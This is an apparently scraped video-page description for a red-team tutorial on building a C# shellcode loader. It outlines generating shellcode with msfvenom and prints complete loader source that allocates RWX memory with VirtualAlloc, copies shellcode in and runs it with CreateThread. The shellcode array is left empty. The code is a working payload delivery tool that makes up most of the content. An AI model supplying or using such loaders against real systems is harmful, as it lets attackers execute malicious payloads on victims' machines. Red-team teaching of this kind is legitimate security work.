MENU

Fun & Interesting

C# payload mastery 01 - simple C# shellcode loader

faanross 2,500 1 year ago
Video Not Working? Fix It Now

link to code: https://github.com/faanross/payloads_mastery/blob/master/01_simple_backdoor.cs note: code can also be found right at the bottom of this description. defcon 27 c# backdoor: https://github.com/mvelazc0/defcon27_csharp_workshop p/invoke signatures in c#: https://www.youtube.com/watch?v=baj9IpB_Z6Y ============================================================ in this first lesson we'll: - use msfvenom to generate shellcode - create a simple C# loader that will perform 3 critical functions: -- allocate memory -- inject shellcode into memory -- execute injected shellcode - integrate shellcode into C# loader - compile our code - test our custom payload =========================================================== timestamps 00:00 - intro 00:43 - msfvenom process 01:15 - shellcode process 02:58 - generate shellcode 04:24 - create c# loader 18:15 - integrate shellcode into loader 19:25 - compile code 19:53 - test payload 20:20 - outro ==================================================================== /* ATTRIBUTION: the code was informed/inspired by: https://github.com/mvelazc0/defcon27_csharp_workshop/blob/master/Labs/lab3/1.cs Mauricio Velazco - @mvelazco Olindo Verrillo - @olindoverrillo */ using System; using System.Runtime.InteropServices; namespace ShellcodePayload { class Payload { [DllImport("kernel32.dll")] private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); [DllImport("kernel32.dll")] private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UInt32 dwStackSize, IntPtr lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId); [DllImport("kernel32.dll")] private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); static void Main() { // (1) insert our shellcode byte[] shellCode = new byte[] { /* insert shellcode here */ }; // (2) allocate memory for shellcode UInt32 MEM_COMMIT = 0x1000; UInt32 PAGE_EXECUTE_READWRITE = 0x40; IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UInt32)shellCode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); // (3) inject shellcode into allocated memory Marshal.Copy(shellCode, 0, funcAddr, shellCode.Length); // (4) execute injected shellcode UInt32 threadId = 0; IntPtr hThread = CreateThread(IntPtr.Zero, 0, funcAddr, IntPtr.Zero, 0, ref threadId); WaitForSingleObject(hThread, 0xFFFFFFFF); } } } ============================================================ #redteamint #csharp #cybersecurity

Comment
Ads video related